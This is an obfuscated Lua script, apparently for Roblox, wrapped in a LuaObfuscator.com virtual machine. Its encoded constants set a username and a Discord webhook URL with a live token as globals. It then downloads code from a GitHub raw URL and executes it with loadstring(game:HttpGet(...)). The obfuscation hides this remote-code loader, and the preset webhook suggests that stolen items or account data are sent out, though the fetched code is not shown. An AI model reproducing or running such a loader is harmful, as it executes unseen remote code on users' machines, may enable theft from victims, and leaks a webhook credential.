--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=((2566 -(1523 + 114)) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(254 + 28 + 595)) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -((185 -(32 + 85)) + 978 + 19))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + ((1 + 3) -(960 -(892 + 65))) ;v34=1;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==(350 -(87 + 194 + 69))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;v36=2 -1 ;end end end local function v23()local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(3 -(5 -3))) then return (v43 * (16778168 -(802 + 150))) + (v42 * 65536) + (v41 * (689 -433)) + v40 ;end if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;v39=998 -(915 + 82) ;end end end local function v24()local v44=v23();local v45=v23();local v46=1 + 0 ;local v47=(v20(v45,1 -0 ,(709 + 498) -(1069 + (430 -312)) ) * (2^(72 -40))) + v44 ;local v48=v20(v45,45 -24 ,6 + 25 );local v49=((v20(v45,56 -24 )==(1 + (0 -0))) and  -(792 -(368 + 423))) or 1 ;if (v48==(859 -(814 + 45))) then if (v47==(0 -0)) then return v49 * (18 -(10 + 8)) ;else local v90=0 -0 ;while true do if (v90==(442 -((1554 -(116 + 1022)) + 26))) then v48=(7 -4) -2 ;v46=0 + 0 ;break;end end end elseif (v48==(3621 -1574)) then return ((v47==(438 -(145 + 293))) and (v49 * ((431 -((183 -139) + 386))/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-(18 + 307 + 698) ) * (v46 + (v47/((1 + 1 + 0)^(824 -(201 + 571))))) ;end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1081 -(1020 + 60)) );v18=v18 + v50 ;local v52={};for v67=886 -(261 + 624) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((7 -4)==v53) then v60=nil;while true do local v91=0 + 0 ;local v92;while true do if (v91==0) then v92=1551 -(1126 + 425) ;while true do if (v92==(1 -0)) then if (1~=v54) then else local v100=0;while true do if (v100==(0 -0)) then v59=v23();v60={};v100=1 + 0 ;end if (v100==(1637 -(1373 + 263))) then for v147=1,v59 do local v148=1000 -(451 + 549) ;local v149;local v150;while true do if ((1 + 0)~=v148) then else if (v149==(2 -1)) then v150=v21()~=(377 -(142 + 235)) ;elseif (v149==(2 -0)) then v150=v24();elseif (v149==3) then v150=v25();end v60[v147]=v150;break;end if (v148==(0 -0)) then local v161=977 -(553 + 424) ;local v162;while true do if (v161~=0) then else v162=0 -0 ;while true do if (v162~=(1 + 0)) then else v148=1 + 0 ;break;end if (v162~=(1384 -(746 + 638))) then else local v168=0 + 0 ;while true do if ((1 + 0)==v168) then v162=1 + 0 ;break;end if (v168==(0 -0)) then v149=v21();v150=nil;v168=1;end end end end break;end end end end end v58[3]=v21();v100=5 -3 ;end if (v100==(2 -0)) then v54=343 -(218 + 123) ;break;end end end break;end if (0~=v92) then else if (v54~=(1581 -(1535 + 46))) then else local v101=0 + 0 ;while true do if ((1 + 0)==v101) then v57={};v58={v55,v56,nil,v57};v101=1 + 1 ;end if (v101~=2) then else v54=1330 -(797 + 532) ;break;end if (v101==0) then v55={};v56={};v101=561 -(306 + 254) ;end end end if (v54==2) then local v102=0;local v103;while true do if (v102~=(0 + 0)) then else v103=0 -0 ;while true do local v151=1467 -(899 + 568) ;while true do if ((1202 -(373 + 829))==v151) then if (v103==(0 + 0)) then for v163=2 -1 ,v23() do local v164=0;local v165;while true do if (v164~=(603 -(268 + 335))) then else v165=v21();if (v20(v165,291 -(60 + 230) ,573 -(426 + 146) )==(0 + 0)) then local v169=238 -(64 + 174) ;local v170;local v171;local v172;local v173;while true do if (v169==0) then local v174=1456 -(282 + 1174) ;local v175;while true do if (v174==(811 -(569 + 242))) then v175=0;while true do if (v175~=(1 + 0)) then else v169=2 -1 ;break;end if (v175==(0 + 0)) then local v186=216 -(42 + 174) ;while true do if (v186==0) then v170=1024 -(706 + 318) ;v171=nil;v186=1252 -(721 + 530) ;end if (v186==1) then v175=1272 -(945 + 326) ;break;end end end end break;end end end if (v169==1) then local v176=0;while true do if (v176==0) then local v177=0 -0 ;while true do if (v177==(1 + 0)) then v176=1;break;end if (v177==0) then v172=nil;v173=nil;v177=1 + 0 ;end end end if (v176==(701 -(271 + 429))) then v169=2;break;end end end if (v169==(5 -3)) then while true do if (v170==(3 + 0)) then if (v20(v172,1503 -(1408 + 92) ,3 + 0 )~=(1087 -(461 + 625))) then else v173[1292 -(993 + 295) ]=v60[v173[3 + 1 ]];end v55[v163]=v173;break;end if (v170==1) then local v179=0;while true do if (v179==1) then v170=1 + 1 ;break;end if (v179==(1171 -(418 + 753))) then local v187=0;local v188;while true do if (v187==(1933 -(565 + 1368))) then v188=0 + 0 ;while true do if (1~=v188) then else v179=3 -2 ;break;end if (v188~=(1661 -(1477 + 184))) then else local v192=0 + 0 ;while true do if (v192~=(1 -0)) then else v188=1;break;end if (v192~=0) then else v173={v22(),v22(),nil,nil};if (v171==(1769 -(1749 + 20))) then local v193=0 + 0 ;local v194;local v195;local v196;while true do if (v193~=1) then else v196=nil;while true do if (v194==1) then while true do if ((1322 -(1249 + 73))~=v195) then else v196=304 -(244 + 60) ;while true do if ((0 + 0)==v196) then v173[1148 -(466 + 679) ]=v22();v173[9 -5 ]=v22();break;end end break;end end break;end if (v194==(1001 -(938 + 63))) then local v203=0 -0 ;while true do if ((0 + 0)~=v203) then else v195=0;v196=nil;v203=1;end if ((1901 -(106 + 1794))==v203) then v194=1 + 0 ;break;end end end end break;end if (v193~=(0 + 0)) then else v194=0 + 0 ;v195=nil;v193=1614 -(1565 + 48) ;end end elseif (v171==1) then v173[8 -5 ]=v23();elseif (v171==(5 -3)) then v173[3]=v23() -((116 -(4 + 110))^(283 -(176 + 91))) ;elseif (v171==(7 -4)) then local v204=584 -(57 + 527) ;local v205;local v206;while true do if (v204==(1427 -(41 + 1386))) then v205=0;v206=nil;v204=104 -(17 + 86) ;end if (v204~=(1 + 0)) then else while true do if (v205~=(0 -0)) then else v206=1875 -(157 + 1718) ;while true do if (v206==(0 -0)) then v173[3 + 0 ]=v23() -((6 -4)^(54 -38)) ;v173[170 -(122 + 44) ]=v22();break;end end break;end end break;end end end v192=2 -1 ;end end end end break;end end end end end if ((0 -0)==v170) then local v180=0;local v181;while true do if (v180==0) then v181=0 -0 ;while true do if (v181~=(0 + 0)) then else local v189=0 -0 ;while true do if (v189==(2 -1)) then v181=1 -0 ;break;end if (v189~=(0 -0)) then else v171=v20(v165,2 + 0 ,3);v172=v20(v165,615 -(602 + 9) ,1 + 5 );v189=1 -0 ;end end end if (v181~=(1190 -(449 + 740))) then else v170=66 -(30 + 35) ;break;end end break;end end end if (2==v170) then local v182=0 + 0 ;local v183;while true do if ((1257 -(1043 + 214))~=v182) then else v183=0 -0 ;while true do if (v183~=(0 + 0)) then else local v190=1212 -(323 + 889) ;local v191;while true do if (v190==(0 -0)) then v191=580 -(361 + 219) ;while true do if (v191~=(1899 -(260 + 1638))) then else v183=321 -(53 + 267) ;break;end if ((0 + 0)~=v191) then else if (v20(v172,414 -(15 + 398) ,983 -(18 + 964) )~=1) then else v173[2]=v60[v173[2]];end if (v20(v172,3 -1 ,7 -5 )==(1206 -(902 + 303))) then v173[5 -2 ]=v60[v173[2 + 1 ]];end v191=1 + 0 ;end end break;end end end if (v183~=(851 -(20 + 830))) then else v170=3;break;end end break;end end end end break;end end end break;end end end for v166=1 + 0 ,v23() do v56[v166-(127 -(116 + 10)) ]=v28();end v103=1;end if (v103==1) then return v58;end break;end end end break;end end end v92=1691 -(1121 + 569) ;end end break;end end end break;end if (v53==2) then v58=nil;v59=nil;v53=217 -(22 + 192) ;end if (v53==(1 + 0)) then local v88=683 -(483 + 200) ;while true do if (v88==1) then v53=740 -(542 + 196) ;break;end if (v88==(0 -0)) then v56=nil;v57=nil;v88=1 + 0 ;end end end if (v53==(0 + 0)) then v54=0;v55=nil;v53=1 + 0 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v87=0;while true do if (1==v87) then if (v82<=6) then if (v82<=2) then if (v82<=0) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==1) then v79[v81[2]]=v81[3];else v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];end elseif (v82<=4) then if (v82==3) then local v111=0;local v112;while true do if (v111==0) then v112=v81[2];v79[v112]=v79[v112](v13(v79,v112 + 1 ,v74));break;end end else local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==0) then v114=v81[2];v115,v116=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v113=1;end if (v113==1) then v74=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v155=v114,v74 do v117=v117 + 1 ;v79[v155]=v115[v117];end break;end end end elseif (v82>5) then v79[v81[2]]();else v79[v81[2]]=v63[v81[3]];end elseif (v82<=9) then if (v82<=7) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>8) then v63[v81[3]]=v79[v81[2]];else local v122;local v123,v124;local v125;local v126;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=v81[2];v125=v79[v81[3]];v79[v126 + 1 ]=v125;v79[v126]=v125[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v126=v81[2];v123,v124=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v74=(v124 + v126) -1 ;v122=0;for v142=v126,v74 do local v143=0;while true do if (v143==0) then v122=v122 + 1 ;v79[v142]=v123[v122];break;end end end v73=v73 + 1 ;v81=v69[v73];v126=v81[2];v79[v126]=v79[v126](v13(v79,v126 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];end elseif (v82<=11) then if (v82>10) then do return;end else for v144=v81[2],v81[3] do v79[v144]=nil;end end elseif (v82==12) then v73=v81[3];else local v137=v81[2];local v138=v79[v81[3]];v79[v137 + 1 ]=v138;v79[v137]=v138[v81[4]];end v73=v73 + 1 ;break;end if (v87==0) then v81=v69[v73];v82=v81[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403373O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F522F6D61696E2F4D61696E2E6C756103083O00557365724E616D65030C3O00496C6F7665737465616B323903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039383138343135333533323436353138322F4879447A47494E544D694A3172336754724F65676B34456136685263684E646D555736446D384763654371756D6F4C696E5A4972447942674F4739553776394E43453947001B3O0012013O00014O000A000100013O00264O00020001000100040C3O00020001001201000100013O00262O000100100001000200040C3O00100001001205000200033O001208000300043O00202O00030003000500122O000500066O000600016O000300066O00023O00024O00020001000100044O001A000100262O000100050001000100040C3O00050001001201000200083O001202000200073O00122O0002000A3O00122O000200093O00122O000100023O00044O0005000100040C3O001A000100040C3O000200012O000B3O00017O00",v9(),...);end
